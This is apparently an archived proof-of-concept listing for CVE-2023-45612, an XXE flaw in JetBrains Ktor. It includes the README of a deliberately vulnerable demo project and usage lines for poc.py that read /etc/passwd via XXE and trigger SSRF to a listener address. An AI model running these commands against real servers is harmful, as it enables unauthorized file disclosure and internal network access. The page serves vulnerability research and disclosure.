Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-45612 PoC — JetBrains Ktor 代码问题漏洞

Source
https://github.com/seraphimi/ktor-xxe
Associated Vulnerability
Title:JetBrains Ktor 代码问题漏洞 (CVE-2023-45612)
Description:JetBrains Ktor framework是捷克JetBrains公司的一款Web应用程序框架。 JetBrains Ktor 2.3.5之前版本存在代码问题漏洞,该漏洞源于ContentNegotiation默认配置存在XML外部实体注入(XXE)漏洞。
Description
CVE-2023-45612 POC and vulnerable project.
Readme
# ktor-xxe


## Run the project with :
| `./gradlew run`                         | Run the server                                                       |


If the server starts successfully, you'll see the following output:

```
2024-12-04 14:32:45.584 [main] INFO  Application - Application started in 0.303 seconds.
2024-12-04 14:32:45.682 [main] INFO  Application - Responding at http://0.0.0.0:8080
```

# To utilize the XXE poc:
## File disclosure
```
python3 poc.py http://localhost:8080 --file /etc/hostname
python3 poc.py http://localhost:8080 --file /etc/passwd
```
## SSRF
```
python3 poc.py http://localhost:8080 --url http://listeneraddress/
```
File Snapshot

 [4.0K]  /data/pocs/cf2fd02a30ee299a5f4fc10e187fbefd5d545bb9
├── [1.1K]  build.gradle.kts
├── [105K]  File disclosure.png
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 43K]  gradle-wrapper.jar
│       └── [ 251]  gradle-wrapper.properties
├── [  91]  gradle.properties
├── [8.5K]  gradlew
├── [2.9K]  gradlew.bat
├── [3.6K]  poc.py
├── [ 658]  README.md
├── [ 114]  settings.gradle.kts
├── [4.0K]  src
│   └── [4.0K]  main
│       ├── [4.0K]  kotlin
│       │   ├── [ 363]  Application.kt
│       │   ├── [ 295]  Message.kt
│       │   └── [ 932]  Routing.kt
│       └── [4.0K]  resources
│           ├── [ 106]  application.yaml
│           └── [ 425]  logback.xml
└── [142K]  SSRF.png

7 directories, 16 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.